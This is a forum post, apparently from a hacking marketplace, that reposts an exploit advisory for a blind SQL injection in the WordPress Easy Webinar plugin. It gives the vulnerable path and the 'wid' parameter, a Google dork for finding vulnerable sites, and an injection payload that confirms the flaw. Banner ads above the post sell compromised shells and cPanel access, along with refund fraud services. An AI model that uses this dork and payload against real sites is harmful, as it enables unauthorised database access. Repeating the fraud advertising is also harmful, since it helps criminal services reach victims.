Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability filter_list
Author
Message
Stricker Offline
Member
Twelve Years of Service
Posts: 203
Threads: 78
Reputation: 0

Points: 0NSP
Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability 10-28-2012, 05:18 PM #1
Code:
#ExploitTitle:Wordpress Easy
Webinar Plugin Blind SQL Injection
Vulnerability

#VendorHomepage:
www.easywebinarplugin.com

#Date:10/26/2012

#Author:RobertCooper(robert.cooper
[at]areyousecure.net)

#Testedon:[Linux/Windows7]

#Vulnerable Parameters:wid=

#GoogleDork:allinurl:get-
widget.php?wid=

##############################################################
Exploit:

www.example.com/wp-content/plugins/
webinar_plugin/get-widget.php?wid=
[SQLi]

Note:The HTTP response will read 404,
but this is false:

www.example.com/wp-content/plugins/
webinar_plugin/get-widget.php?wid=3'
or'x'='x

This wil lresult in the page loading
correctly and show that the pluginis
vulnerable to injection (string).

##############################################################
[Image: deceptionorangeoverlay.png]

Reply







Users browsing this thread: 1 Guest(s)